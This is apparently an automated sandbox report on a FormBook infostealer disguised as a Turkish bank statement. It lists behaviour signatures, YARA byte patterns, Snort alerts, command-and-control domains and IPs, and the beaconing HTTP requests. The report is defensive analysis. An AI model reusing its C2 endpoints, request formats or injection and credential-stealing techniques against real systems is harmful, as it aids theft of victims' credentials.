Windows Analysis Report
T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exe

Overview

General Information

Sample Name:T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exe
Analysis ID:808219
MD5:d668ae995548e2dc9b3193cb59ac9c02
SHA1:9419fbd2082f2ac33dd07c457e20839669de6ee7
SHA256:5f2de407396cfb921e5db52d5efb0fbfd44e7257630b079e02f83a1ed61ab4b4
Tags:exe, Formbook
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Multi AV Scanner detection for dropped file
Snort IDS alert for network traffic
Sample uses process hollowing technique
Tries to steal Mail credentials (via file / registry access)
Maps a DLL or memory area into another process
Machine Learning detection for sample
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Modifies the context of a thread in another process (thread injection)
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops PE files
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality for read data from the clipboard

Classification

  • System is w10x64
  • T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exe (PID: 3340 cmdline: C:\Users\user\Desktop\T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exe MD5: D668AE995548E2DC9B3193CB59AC9C02)
    • oaqcoreqiw.exe (PID: 2400 cmdline: "C:\Users\user~1\AppData\Local\Temp\oaqcoreqiw.exe" C:\Users\user~1\AppData\Local\Temp\xptrw.i MD5: 7719839B64AEF3F35ABECB784C0BDB46)
      • oaqcoreqiw.exe (PID: 5776 cmdline: C:\Users\user~1\AppData\Local\Temp\oaqcoreqiw.exe MD5: 7719839B64AEF3F35ABECB784C0BDB46)
        • explorer.exe (PID: 3320 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
          • wlanext.exe (PID: 5448 cmdline: C:\Windows\SysWOW64\wlanext.exe MD5: CD1ED9A48316D58513D8ECB2D55B5C04)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
00000002.00000002.303606664.0000000000F10000.00000040.10000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
    00000002.00000002.303606664.0000000000F10000.00000040.10000000.00040000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown
    • 0x1f0d0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0xae4f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    • 0x18307:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
    00000002.00000002.303606664.0000000000F10000.00000040.10000000.00040000.00000000.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
    • 0x18105:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x17ba1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x18207:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1837f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xaa1a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x16dec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0x1de77:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1ee2a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000002.00000002.303417878.0000000000DC0000.00000040.10000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
      00000002.00000002.303417878.0000000000DC0000.00000040.10000000.00040000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown
      • 0x1f0d0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0xae4f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      • 0x18307:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
      Source | Rule | Description | Author | Strings
      2.2.oaqcoreqiw.exe.400000.0.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
        2.2.oaqcoreqiw.exe.400000.0.unpack | Windows_Trojan_Formbook_1112e116 | unknown | unknown
        • 0x20083:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
        • 0xbe02:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
        • 0x192ba:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
        2.2.oaqcoreqiw.exe.400000.0.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
        • 0x190b8:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x18b54:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x191ba:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x19332:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0xb9cd:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x17d9f:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0x1ee2a:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1fddd:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        2.2.oaqcoreqiw.exe.400000.0.raw.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
          2.2.oaqcoreqiw.exe.400000.0.raw.unpack | Windows_Trojan_Formbook_1112e116 | unknown | unknown
          • 0x20e83:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0xcc02:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
          • 0x1a0ba:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
          No Sigma rule has matched
          Timestamp: 02/15/23-08:43:11.353362
          Source IP: 192.168.2.7
          Destination IP: 198.54.117.215
          SID: 2031453
          Source Port: 49730
          Destination Port: 80
          Protocol: TCP
          Classtype: A Network Trojan was detected
          Timestamp: 02/15/23-08:43:11.353362
          Source IP: 192.168.2.7
          Destination IP: 198.54.117.215
          SID: 2031412
          Source Port: 49730
          Destination Port: 80
          Protocol: TCP
          Classtype: A Network Trojan was detected
          Timestamp: 02/15/23-08:43:11.353362
          Source IP: 192.168.2.7
          Destination IP: 198.54.117.215
          SID: 2031449
          Source Port: 49730
          Destination Port: 80
          Protocol: TCP
          Classtype: A Network Trojan was detected
          Timestamp: 02/15/23-08:41:49.483195
          Source IP: 192.168.2.7
          Destination IP: 8.8.8.8
          SID: 2023883
          Source Port: 50505
          Destination Port: 53
          Protocol: UDP
          Classtype: Potentially Bad Traffic

          AV Detection

          Source: T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exeReversingLabs: Detection: 35%
          Source: T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exeVirustotal: Detection: 39%
          Source: Yara matchFile source: 2.2.oaqcoreqiw.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.oaqcoreqiw.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000002.00000002.303606664.0000000000F10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.303417878.0000000000DC0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.513151308.0000000002BA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.512971640.0000000000B30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.513376211.0000000002EA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.303227633.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: http://www.searchvity.com/?dn=URL Reputation: Label: malware
          Source: http://www.searchvity.com/URL Reputation: Label: malware
          Source: http://www.octohoki.net/ghii/Avira URL Cloud: Label: malware
          Source: http://www.hubyazilim.com/ghii/Avira URL Cloud: Label: malware
          Source: http://www.wenzid4.top/ghii/?P5V1e9=5El5vwlhmyt&xMjnfN-Y=MOY5/0rZkCSn1x8B5kGxcu4kjN12BC26NMBU4rUAiJ09dU/WDm+Fx0Du9tK3DtQGeLOXEwxSHBLi0tUrRAF3OATx/e31Ge81BxjFPOt13FZGAvira URL Cloud: Label: malware
          Source: http://www.octohoki.netAvira URL Cloud: Label: malware
          Source: http://www.octohoki.net/ghii/?P5V1e9=5El5vwlhmyt&xMjnfN-Y=mbPzPtZ0Er8L5pad82wwGh9ocqcT3a4VC5lEcjpUbblZCC9rEfNiJ4Zzn4lMJLJJ2TaA1od8FsE8LCEUSFIoQK3x8J3agnpi0FJwMyByf64hAvira URL Cloud: Label: malware
          Source: http://www.energybig.xyz/ghii/Avira URL Cloud: Label: malware
          Source: http://www.7dkjhk.com/ghii/Avira URL Cloud: Label: malware
          Source: http://www.ladybillplanet.com/ghii/Avira URL Cloud: Label: malware
          Source: http://www.wenzid4.top/ghii/Avira URL Cloud: Label: malware
          Source: http://www.energybig.xyz/ghii/?P5V1e9=5El5vwlhmyt&xMjnfN-Y=Hsu0eFbPaPXvQj1driY9Qb+UxIEGydZDMi24Zx/KBNJzrILAD6eOCtsvvO79CgG5LYmF38wKy0LUujLv+r7gk6B8rCsM/9BrBFmoNQDax5Q2Avira URL Cloud: Label: malware
          Source: http://www.genuineinsights.cloudAvira URL Cloud: Label: phishing
          Source: http://www.genuineinsights.cloud/ghii/?xMjnfN-Y=b9pmEiWE3A9hICRLJ48/0GIWTdcguNEQkRUuEoMGZR2jfpcIS7+82C+h9uoa2hbDMoucG0FStkg6AqIGzw0g3xi7GVGpMQC8nL5ipoR7ehtO&P5V1e9=5El5vwlhmytAvira URL Cloud: Label: malware
          Source: http://www.energybig.xyzAvira URL Cloud: Label: malware
          Source: http://www.genuineinsights.cloud/ghii/Avira URL Cloud: Label: malware
          Source: C:\Users\user\AppData\Local\Temp\oaqcoreqiw.exeReversingLabs: Detection: 12%
          Source: T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exeJoe Sandbox ML: detected
          Source: 2.2.oaqcoreqiw.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 1.2.oaqcoreqiw.exe.1010000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
          Source: T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Source: Binary string: wntdll.pdbUGP source: oaqcoreqiw.exe, 00000001.00000003.249486929.000000001AB90000.00000004.00001000.00020000.00000000.sdmp, oaqcoreqiw.exe, 00000001.00000003.248858259.0000000002C50000.00000004.00001000.00020000.00000000.sdmp, oaqcoreqiw.exe, 00000002.00000002.303874749.00000000011EF000.00000040.00001000.00020000.00000000.sdmp, oaqcoreqiw.exe, 00000002.00000002.303874749.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, oaqcoreqiw.exe, 00000002.00000003.257475218.0000000000D20000.00000004.00000020.00020000.00000000.sdmp, wlanext.exe, 00000009.00000003.305180491.00000000032C1000.00000004.00000020.00020000.00000000.sdmp, wlanext.exe, 00000009.00000002.513936426.000000000357F000.00000040.00001000.00020000.00000000.sdmp, wlanext.exe, 00000009.00000003.303312759.000000000312C000.00000004.00000020.00020000.00000000.sdmp, wlanext.exe, 00000009.00000002.513936426.0000000003460000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: oaqcoreqiw.exe, 00000001.00000003.249486929.000000001AB90000.00000004.00001000.00020000.00000000.sdmp, oaqcoreqiw.exe, 00000001.00000003.248858259.0000000002C50000.00000004.00001000.00020000.00000000.sdmp, oaqcoreqiw.exe, 00000002.00000002.303874749.00000000011EF000.00000040.00001000.00020000.00000000.sdmp, oaqcoreqiw.exe, 00000002.00000002.303874749.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, oaqcoreqiw.exe, 00000002.00000003.257475218.0000000000D20000.00000004.00000020.00020000.00000000.sdmp, wlanext.exe, 00000009.00000003.305180491.00000000032C1000.00000004.00000020.00020000.00000000.sdmp, wlanext.exe, 00000009.00000002.513936426.000000000357F000.00000040.00001000.00020000.00000000.sdmp, wlanext.exe, 00000009.00000003.303312759.000000000312C000.00000004.00000020.00020000.00000000.sdmp, wlanext.exe, 00000009.00000002.513936426.0000000003460000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: wlanext.pdb source: oaqcoreqiw.exe, 00000002.00000002.303761308.0000000001000000.00000040.10000000.00040000.00000000.sdmp
          Source: Binary string: wlanext.pdbGCTL source: oaqcoreqiw.exe, 00000002.00000002.303761308.0000000001000000.00000040.10000000.00040000.00000000.sdmp
          Source: C:\Users\user\Desktop\T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exeCode function: 0_2_00405D74 CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405D74
          Source: C:\Users\user\Desktop\T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exeCode function: 0_2_0040699E FindFirstFileW,FindClose,0_2_0040699E
          Source: C:\Users\user\Desktop\T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exeCode function: 0_2_0040290B FindFirstFileW,0_2_0040290B
          Source: C:\Users\user\AppData\Local\Temp\oaqcoreqiw.exeCode function: 1_2_010A1042 FindFirstFileW,FindClose,1_2_010A1042
          Source: C:\Users\user\AppData\Local\Temp\oaqcoreqiw.exeCode function: 1_2_010A1050 FindFirstFileW,FindClose,1_2_010A1050
          Source: C:\Users\user\AppData\Local\Temp\oaqcoreqiw.exeCode function: 2_2_010A1042 FindFirstFileW,FindClose,2_2_010A1042
          Source: C:\Users\user\AppData\Local\Temp\oaqcoreqiw.exeCode function: 2_2_010A1050 FindFirstFileW,FindClose,2_2_010A1050

          Networking

          Source: C:\Windows\explorer.exeDomain query: www.genuineinsights.cloud
          Source: C:\Windows\explorer.exeDomain query: www.octohoki.net
          Source: C:\Windows\explorer.exeNetwork Connect: 107.148.8.96 80
          Source: C:\Windows\explorer.exeNetwork Connect: 194.102.227.30 80
          Source: C:\Windows\explorer.exeNetwork Connect: 184.94.215.91 80
          Source: C:\Windows\explorer.exeNetwork Connect: 66.96.162.149 80
          Source: C:\Windows\explorer.exeDomain query: www.cutgang.net
          Source: C:\Windows\explorer.exeDomain query: www.energybig.xyz
          Source: C:\Windows\explorer.exeNetwork Connect: 198.54.117.215 80
          Source: C:\Windows\explorer.exeDomain query: www.wenzid4.top
          Source: TrafficSnort IDS: 2023883 ET DNS Query to a *.top domain - Likely Hostile 192.168.2.7:50505 -> 8.8.8.8:53
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49730 -> 198.54.117.215:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49730 -> 198.54.117.215:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49730 -> 198.54.117.215:80
          Source: C:\Windows\explorer.exeDNS query: www.energybig.xyz
          Source: Joe Sandbox ViewASN Name: BIZLAND-SDUS BIZLAND-SDUS
          Source: Joe Sandbox ViewASN Name: PEGTECHINCUS PEGTECHINCUS
          Source: global trafficHTTP traffic detected: GET /ghii/?P5V1e9=5El5vwlhmyt&xMjnfN-Y=MOY5/0rZkCSn1x8B5kGxcu4kjN12BC26NMBU4rUAiJ09dU/WDm+Fx0Du9tK3DtQGeLOXEwxSHBLi0tUrRAF3OATx/e31Ge81BxjFPOt13FZG HTTP/1.1Host: www.wenzid4.topConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ghii/?P5V1e9=5El5vwlhmyt&xMjnfN-Y=Hsu0eFbPaPXvQj1driY9Qb+UxIEGydZDMi24Zx/KBNJzrILAD6eOCtsvvO79CgG5LYmF38wKy0LUujLv+r7gk6B8rCsM/9BrBFmoNQDax5Q2 HTTP/1.1Host: www.energybig.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ghii/?xMjnfN-Y=b9pmEiWE3A9hICRLJ48/0GIWTdcguNEQkRUuEoMGZR2jfpcIS7+82C+h9uoa2hbDMoucG0FStkg6AqIGzw0g3xi7GVGpMQC8nL5ipoR7ehtO&P5V1e9=5El5vwlhmyt HTTP/1.1Host: www.genuineinsights.cloudConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ghii/?P5V1e9=5El5vwlhmyt&xMjnfN-Y=mbPzPtZ0Er8L5pad82wwGh9ocqcT3a4VC5lEcjpUbblZCC9rEfNiJ4Zzn4lMJLJJ2TaA1od8FsE8LCEUSFIoQK3x8J3agnpi0FJwMyByf64h HTTP/1.1Host: www.octohoki.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 66.96.162.149 66.96.162.149
          Source: global trafficHTTP traffic detected: POST /ghii/ HTTP/1.1Host: www.energybig.xyzConnection: closeContent-Length: 194Cache-Control: no-cacheOrigin: http://www.energybig.xyzUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.energybig.xyz/ghii/Accept-Language: en-USAccept-Encoding: gzip, deflate
          Source: global trafficHTTP traffic detected: POST /ghii/ HTTP/1.1Host: www.genuineinsights.cloudConnection: closeContent-Length: 194Cache-Control: no-cacheOrigin: http://www.genuineinsights.cloudUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.genuineinsights.cloud/ghii/Accept-Language: en-USAccept-Encoding: gzip, deflate
          Source: global trafficHTTP traffic detected: POST /ghii/ HTTP/1.1Host: www.octohoki.netConnection: closeContent-Length: 194Cache-Control: no-cacheOrigin: http://www.octohoki.netUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.octohoki.net/ghii/Accept-Language: en-USAccept-Encoding: gzip, deflate
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 15 Feb 2023 07:40:07 GMTContent-Type: text/htmlContent-Length: 146Connection: close
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 15 Feb 2023 07:42:52 GMTServer: ApacheContent-Length: 5278Connection: closeContent-Type: text/html
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 15 Feb 2023 07:42:55 GMTServer: ApacheContent-Length: 5278Connection: closeContent-Type: text/html; charset=utf-8
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 15 Feb 2023 07:43:00 GMTContent-Type: text/htmlContent-Length: 867Connection: closeServer: Apache/2Last-Modified: Fri, 10 Jan 2020 16:05:10 GMTAccept-Ranges: bytesAge: 0
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 15 Feb 2023 07:43:03 GMTContent-Type: text/htmlContent-Length: 867Connection: closeServer: Apache/2Last-Modified: Fri, 10 Jan 2020 16:05:10 GMTAccept-Ranges: bytesAge: 0
          Source: T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exe String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
          Source: unknown HTTP traffic detected: POST /ghii/ HTTP/1.1 Host: www.energybig.xyz Connection: close Content-Length: 194 Cache-Control: no-cache Origin: http://www.energybig.xyz User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Type: application/x-www-form-urlencoded Accept: */* Referer: http://www.energybig.xyz/ghii/ Accept-Language: en-US Accept-Encoding: gzip, deflate
          Source: unknown DNS traffic detected: queries for: www.wenzid4.top
          Source: global traffic HTTP traffic detected: GET /ghii/?P5V1e9=5El5vwlhmyt&xMjnfN-Y=MOY5/0rZkCSn1x8B5kGxcu4kjN12BC26NMBU4rUAiJ09dU/WDm+Fx0Du9tK3DtQGeLOXEwxSHBLi0tUrRAF3OATx/e31Ge81BxjFPOt13FZG HTTP/1.1 Host: www.wenzid4.top Connection: close
          Source: global traffic HTTP traffic detected: GET /ghii/?P5V1e9=5El5vwlhmyt&xMjnfN-Y=Hsu0eFbPaPXvQj1driY9Qb+UxIEGydZDMi24Zx/KBNJzrILAD6eOCtsvvO79CgG5LYmF38wKy0LUujLv+r7gk6B8rCsM/9BrBFmoNQDax5Q2 HTTP/1.1 Host: www.energybig.xyz Connection: close
          Source: global traffic HTTP traffic detected: GET /ghii/?xMjnfN-Y=b9pmEiWE3A9hICRLJ48/0GIWTdcguNEQkRUuEoMGZR2jfpcIS7+82C+h9uoa2hbDMoucG0FStkg6AqIGzw0g3xi7GVGpMQC8nL5ipoR7ehtO&P5V1e9=5El5vwlhmyt HTTP/1.1 Host: www.genuineinsights.cloud Connection: close
          Source: global traffic HTTP traffic detected: GET /ghii/?P5V1e9=5El5vwlhmyt&xMjnfN-Y=mbPzPtZ0Er8L5pad82wwGh9ocqcT3a4VC5lEcjpUbblZCC9rEfNiJ4Zzn4lMJLJJ2TaA1od8FsE8LCEUSFIoQK3x8J3agnpi0FJwMyByf64h HTTP/1.1 Host: www.octohoki.net Connection: close
          Source: C:\Users\user\Desktop\T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exe Code function: 0_2_00405809 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard

          E-Banking Fraud

          Source: Yara match File source: 2.2.oaqcoreqiw.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match File source: 2.2.oaqcoreqiw.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match File source: 00000002.00000002.303606664.0000000000F10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 00000002.00000002.303417878.0000000000DC0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 00000009.00000002.513151308.0000000002BA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 00000009.00000002.512971640.0000000000B30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 00000009.00000002.513376211.0000000002EA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 00000002.00000002.303227633.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

          System Summary

          Source: 2.2.oaqcoreqiw.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 2.2.oaqcoreqiw.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.oaqcoreqiw.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 2.2.oaqcoreqiw.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.303606664.0000000000F10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000002.00000002.303606664.0000000000F10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.303417878.0000000000DC0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000002.00000002.303417878.0000000000DC0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000009.00000002.513151308.0000000002BA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000009.00000002.513151308.0000000002BA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000009.00000002.512971640.0000000000B30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000009.00000002.512971640.0000000000B30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000009.00000002.513376211.0000000002EA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000009.00000002.513376211.0000000002EA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.303227633.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000002.00000002.303227633.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
          Source: 2.2.oaqcoreqiw.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 2.2.oaqcoreqiw.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
